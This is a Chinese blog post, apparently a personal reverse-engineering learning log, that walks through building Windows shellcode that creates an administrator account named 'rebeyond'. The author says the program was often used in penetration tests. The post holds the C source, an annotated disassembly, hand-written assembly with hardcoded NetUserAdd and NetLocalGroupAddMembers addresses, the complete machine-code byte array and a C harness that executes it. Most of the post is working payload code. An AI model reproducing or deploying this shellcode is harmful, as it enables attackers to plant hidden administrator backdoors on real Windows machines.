逆向工程学习第二天--动手开发自己的第一个shellcode


Sep 11 2016

逆向工程学习第二天--动手开发自己的第一个shellcode

首页 » 渗透测试 » 逆向工程学习第二天--动手开发自己的第一个shellcode   

一个简单的c语言添加windows管理员账号的小程序,之前在渗透的时候经常用到,现在拿它来做自己的第一个shellcode。

C代码:

#pragma comment(lib, "netapi32.lib")

#include "windows.h"

#include <Lm.h>

int main(int argc, char* argv[])

{

         NET_API_STATUS ret = 0;

    DWORD dwErr = 0;

    USER_INFO_1 oUserInfo;

    ZeroMemory(&oUserInfo, sizeof(oUserInfo));

    oUserInfo.usri1_name = L"rebeyond";

    oUserInfo.usri1_priv = USER_PRIV_USER;

    oUserInfo.usri1_flags = UF_NORMAL_ACCOUNT;

    ret = NetUserAdd(NULL, 1, (LPBYTE)(&oUserInfo), &dwErr);

 

    //Add that accout into the administrators group

    _LOCALGROUP_MEMBERS_INFO_3 oUser;

    oUser.lgrmi3_domainandname = oUserInfo.usri1_name;

    ret = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)(&oUser), 1);

         return 0;

}

OD反汇编代码:

00401000  /$  83EC 28       sub esp,0x28 //为main函数内的局部变量分配空间, dwErr ,oUserInfo和oUser,共40个字节。

00401003  |.  57            push edi  //备份调用前的edi内容。

00401004  |.  B9 08000000   mov ecx,0x8 //对oUserInfo结构体进行初始化,共32个字节,以DWORD为单位进行8次循环,此处设置循环次数。

00401009  |.  33C0          xor eax,eax  //设置填充内容,为0x00。

0040100B  |.  8D7C24 0C     lea edi,dword ptr ss:[esp+0xC]  //设置edi为oUserInfo的初始地址。

0040100F  |.  F3:AB         rep stos dword ptr es:[edi] //循环拷贝eax里的值到edi所指的地址 。

00401011  |.  8D4424 04     lea eax,dword ptr ss:[esp+0x4]  //设置eax为dwErr的地址。

00401015  |.  8D4C24 0C     lea ecx,dword ptr ss:[esp+0xC]  //设置ecx为oUserInfo的地址。

00401019  |.  50            push eax //准备入栈参数&dwErr。

0040101A  |.  51            push ecx  //准备入栈参数&oUserInfo。

0040101B  |.  6A 01         push 0x1  //准备入栈参数1。

0040101D  |.  6A 00         push 0x0  //准备入栈参数0。

0040101F  |.  C74424 14 000>mov dword ptr ss:[esp+0x14],0x0 //把dwErr赋值为0.

00401027  |.  C74424 1C 505>mov dword ptr ss:[esp+0x1C],addsc.004050>; //设置 oUserInfo 的第一个元素为字符串"rebeyond"的地址

0040102F  |.  C74424 28 010>mov dword ptr ss:[esp+0x28],0x1 //设置oUserInfo 的一些必要元素:usri1_priv;

00401037  |.  C74424 34 000>mov dword ptr ss:[esp+0x34],0x200  //设置oUserInfo 的一些必要元素:usri1_flags;

0040103F  |.  E8 32000000   call <jmp.&NETAPI32.NetUserAdd> //调用NetUserAdd

00401044  |.  8B5424 0C     mov edx,dword ptr ss:[esp+0xC]  //把oUserInfo首地址赋值给edx。

00401048  |.  8D4424 08     lea eax,dword ptr ss:[esp+0x8] //把oUser结构体地址赋给eax。

0040104C  |.  6A 01         push 0x1 //准备调用参数1。

0040104E  |.  50            push eax  //准备调用参数&oUser。

0040104F  |.  6A 03         push 0x3  //准备调用参数3。

00401051  |.  68 30504000   push addsc.00405030  //准备调用参数"Administrators"。

00401056  |.  6A 00         push 0x0 //准备调用参数NULL,即为0。

00401058  |.  895424 1C     mov dword ptr ss:[esp+0x1C],edx   //把oUserInfo结构体的第一个DWORD(为“rebeyond”字符串的地址)赋值给oUser结构体唯一的一个元素。

0040105C  |.  E8 0F000000   call <jmp.&NETAPI32.NetLocalGroupAddMemb>  //调用NetLocalGroupAddMembers。

00401061  |.  33C0          xor eax,eax  //把eax清零,准备返回值。

00401063  |.  5F            pop edi   //把之前备份的edi恢复。

00401064  |.  83C4 28       add esp,0x28  //恢复栈帧。

00401067  \.  C3            retn  //返回操作系统代码。

相关结构体:

typedef struct _USER_INFO_1 {

    LPWSTR   usri1_name;

    LPWSTR   usri1_password;

    DWORD    usri1_password_age;

    DWORD    usri1_priv;

    LPWSTR   usri1_home_dir;

    LPWSTR   usri1_comment;

    DWORD    usri1_flags;

    LPWSTR   usri1_script_path;

}USER_INFO_1, *PUSER_INFO_1, *LPUSER_INFO_1;

USER_INFO_1结构体有八个DWORD元素,共32个字节。

typedef struct _LOCALGROUP_MEMBERS_INFO_3 {

     LPWSTR       lgrmi3_domainandname;

} LOCALGROUP_MEMBERS_INFO_3, *PLOCALGROUP_MEMBERS_INFO_3,

  *LPLOCALGROUP_MEMBERS_INFO_3;

LOCALGROUP_MEMBERS_INFO_3结构体只有一个元素,占4个字节。

这段代码具有添加管理员用户的功能,但是我想把它直接复制到漏洞程序作为shellcode是行不通的,因为程序是包括代码和数据的,我只是复制了代码,并没有复制存在于堆栈中的数据,比如shellcode中运行上图红色标记的代码,就会发生错误,因为字符串在漏洞程序中根本不存在。所以,如果想要作为shellcode来使用的话,所有用到的数据必须全部由代码来负载。下面开始打造可以独立运行的shellcode。

反观这段代码,其实就是2个API的调用,我们只要push参数来完成这两个函数调用就可以了。

C函数调用: ret = NetUserAdd(NULL, 1, (LPBYTE)(&oUserInfo), &dwErr);

      NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)(&oUser), 1);

Shellcode  asm代码:

                   push ebp   //备份ebp

                   mov ebp,esp  //设置新的ebp

                   sub esp,0x28  //抬高栈顶

                   mov ecx,0x10   //为栈初始化准备循环次数

                   xor eax,eax    //为栈初始化准备填充内容

                   lea edi,dword ptr ss:[esp-4]  //从栈顶开始初始化

                   rep stos dword ptr es:[edi]   //全部填充为00

                   mov [ebp-8],0  //设置局部变量,准备函数第四个参数dwErr。

                   push 0x00000000 //准备函数第三个参数,把用户名字符串入栈,为oUserInfo准备数据

                   push 0x0064006E //同上

                   push 0x006F0079  //同上

                   push 0x00650062  //同上

                   push 0x00650072  //同上,为字符串rebeyond的Unicode形式,必须Unicode。

                   lea edx,[esp]  //取得用户名字符串的地址,放入edi。

                   mov [esp+0x14],edx  //把oUserInfo结构的首个元素赋值为用户名首地址

                   mov [esp+0x20],1  //设置oUserInfo第四个必须元素usri1_priv为1.

                   mov [esp+0x2C], 0x0200  //设置oUserInfo第七个必须元素usri1_flags为0x200

                   lea eax,[ebp-0x8]  //取dwErr的地址。

                   push eax  //参数入栈,&dwErr

                   lea edi,[esp+0x18]  //取oUserInfo的地址,

                   push edi  //参数入栈,&oUserInfo

                   push 1  //参数入栈。

                   push 0  //参数入栈

                   mov eax,0x5fe0457c  //把NetUserAdd函数地址赋值给eax

                   call eax  //调用NetUserAdd

                   push 0x00000000  //把字符串Administrtors入栈。

                   push 0x00730072

                   push 0x006f0074

                   push 0x00610072

                   push 0x00740073

                   push 0x0069006e

                   push 0x0069006d

                   push 0x00640041

                   lea esi,[esp]  //取得administrators字符串地址。

                   push 1  //准备参数。

                   push edi

                   push 3

                   push esi

                   push 0

                   mov ebx,0x5fe04534  //把NetLocalGroupAddMembers函数地址赋值给eax

                   call ebx  //调用NetLocalGroupAddMembers

                   mov esp,ebp  //恢复现场

                   pop ebp  //恢复现场

                   ret  //返回

机器码:

0x55,0x8B,0xEC,0x83,0xEC,0x28,0xB9,0x10,0x00,0x00,0x00,0x33,0xC0,0x36,0x8D,0x7C,0x24,0xFC,0xF3,0xAB,0xC6,0x45,0xF8,0x00,0x6A,0x00,0x68,0x6E,0x00,0x64,0x00,0x68,0x79,0x00,0x6F,0x00,0x68,0x62,0x00,0x65,0x00,0x68,0x72,0x00,0x65,0x00,0x8D,0x14,0x24,0x89,0x54,0x24,0x14,0xC6,0x44,0x24,0x20,0x01,0xC6,0x44,0x24,0x2C,0x00,0x8D,0x45,0xF8,0x50,0x8D,0x7C,0x24,0x18,0x57,0x6A,0x01,0x6A,0x00,0xB8,0x7C,0x45,0xE0,0x5F,0xFF,0xD0,0x6A,0x00,0x68,0x72,0x00,0x73,0x00,0x68,0x74,0x00,0x6F,0x00,0x68,0x72,0x00,0x61,0x00,0x68,0x73,0x00,0x74,0x00,0x68,0x6E,0x00,0x69,0x00,0x68,0x6D,0x00,0x69,0x00,0x68,0x41,0x00,0x64,0x00,0x8D,0x34,0x24,0x6A,0x01,0x57,0x6A,0x03,0x56,0x6A,0x00,0xBB,0x34,0x45,0xE0,0x5F,0xFF,0xD3,0x8B,0xE5,0x5D,0xC3

Shellcode+C测试:

 

#pragma comment(lib, "netapi32.lib")

#include "stdio.h"

#include "windows.h"

#include <Lm.h>

int main()
{
         HINSTANCE hInstLibrary = LoadLibrary("netapi32.dll");
    if (hInstLibrary == NULL)
    {
         printf("Load Dll Error");
         return 1;
    }
         unsigned char shellcode[]={0x55,0x8B,0xEC,0x83,0xEC,0x28,0xB9,0x10,0x00,0x00,0x00,0x33,0xC0,0x36,0x8D,0x7C,0x24,0xFC,0xF3,0xAB,0xC6,0x45,0xF8,0x00,0x6A,0x00,0x68,0x6E,0x00,0x64,0x00,0x68,0x79,0x00,0x6F,0x00,0x68,0x62,0x00,0x65,0x00,0x68,0x72,0x00,0x65,0x00,0x8D,0x14,0x24,0x89,0x54,0x24,0x14,0xC6,0x44,0x24,0x20,0x01,0xC6,0x44,0x24,0x2C,0x00,0x8D,0x45,0xF8,0x50,0x8D,0x7C,0x24,0x18,0x57,0x6A,0x01,0x6A,0x00,0xB8,0x7C,0x45,0xE0,0x5F,0xFF,0xD0,0x6A,0x00,0x68,0x72,0x00,0x73,0x00,0x68,0x74,0x00,0x6F,0x00,0x68,0x72,0x00,0x61,0x00,0x68,0x73,0x00,0x74,0x00,0x68,0x6E,0x00,0x69,0x00,0x68,0x6D,0x00,0x69,0x00,0x68,0x41,0x00,0x64,0x00,0x8D,0x34,0x24,0x6A,0x01,0x57,0x6A,0x03,0x56,0x6A,0x00,0xBB,0x34,0x45,0xE0,0x5F,0xFF,0xD3,0x8B, 0xE5,0x5D,0xC3};
         __asm 
   { 
                   lea eax,shellcode
                   push eax
                   ret
   }
           return 0;

}

 

 

OH YEAH!成功添加管理员用户:

 

1.png

 

问题:

中间遇到一个问题,NetLocalGroupAddMembers的调用老是不成功,出现异常,原来以为是调用参数的堆栈没有组织好,耽误了一个多小时,后来发现是问题在这,就是这段代码(上文中标红的那两行):

                   mov ebx,0x5fe04534  //把NetLocalGroupAddMembers函数地址赋值给eax

                   call ebx  //调用NetLocalGroupAddMembers

就是把NetLocalGroupAddMembers函数的地址赋值给ebx,然后调用ebx。

但是我用eax就是不成功,代码明明是mov eax,0x5fe04534,但是赋值语句执行之后eax的值却偏偏是0x5fe0cc34,中间的45换成了cc,到底是何解呢?望高手赐教!!!

另外,这个shellcode下一步需要完善几个地方:

函数地址要动态获取。
字节实在是太多,需要大瘦身。
顺便发张NetLocalGroupAddMembers的堆栈截图,留个纪念,省的以后再回过头来看的时候费劲。

 

2.png

 

http://www.cnblogs.com/rebeyond/p/4835826.html

 

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: 逆向学习

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «逆向工程学习第三天--另外一个ShellCode | 逆向工程学习第一天--一个VC6编译的小程序»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~